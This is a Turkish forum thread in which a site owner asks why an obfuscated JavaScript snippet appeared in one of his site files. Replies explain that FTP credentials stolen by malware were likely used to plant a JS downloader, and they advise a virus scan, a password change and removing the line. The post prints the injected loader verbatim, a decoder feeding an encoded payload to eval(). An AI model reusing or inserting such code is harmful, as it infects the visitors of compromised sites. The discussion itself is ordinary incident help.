ilginç bir durum ile karşı karşıya kaldım bir js kodu eklenmiş.

[Cronic]

Kod:

 <script language=JavaScript>function xsiban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,27,16,39,20,51,15,48,26,13,0,0,0,0,0,0,46,42,6,55,10,31,17,49,0,19,8,32,18,29,41,33,34,7,61,5,52,53,30,38,35,12,40,0,0,0,0,56,0,11,23,36,37,44,45,1,9,21,25,57,2,47,3,59,60,43,54,24,14,4,50,62,58,28,22);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){{w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(249^w&255);w>>=8;s-=2}else{s=6}}}eval(r);}}xsiban('tlkdM8NXbqsXsrJXDLeCR8kdyxf7M8NWYLh3br_Ut@Jc9vjTVbYcE@JW4vjrbPhdyLevYCy3jq_P8LprFrsXhteUzohW9vj58zhc8DNPbEh398MXz1eCLIaW9BkUa8hXbrjTTPjXFVRPsVj3zLjT26Rv9np56nfTVqY59CNCLoRrjoJcMrscuCevg3McylN3FrJGYoyrDrJKivhG1ChcDWsdsl_7b8kdy@RGS19cE@JW4vkGVn9')</script>

bir sabah uyandıgımda sitenin bir dosyasına bu satır eklenmiş nasıl ve ne amaç ile eklenmiş olabişir?

[kostebek]

Linux sunucu ise SHELL dediğimiz betikleri bir şekilde sitene eklemiş olabilir. Şüpheli yerler: dosya, resim vs upload edilen yerler olabilir.

Dosyayı çalıştırdım Kaspesky Trojan buldu 2 tane

[Cronic]

Bu normal bir durum mu çünki sitenin çalışmasında problem yaratıyor... neden kaynaklanmış olabilir...

[Raiden]

cronic bu şu şekilde yerleşiyor. bilgisayara bulaşan bir worm malware vs tarzı programlar keylogger tutup bir yere gönderiyor bilgileri alanlarda ftp ile bağlanıp bu js downloader yerleştiriyorlar. öncelikle bilgisayarını virüs kontrolünden geçir ardından. ftp bilgilerini değiştir şifreni sonra da ilgili satırı sil.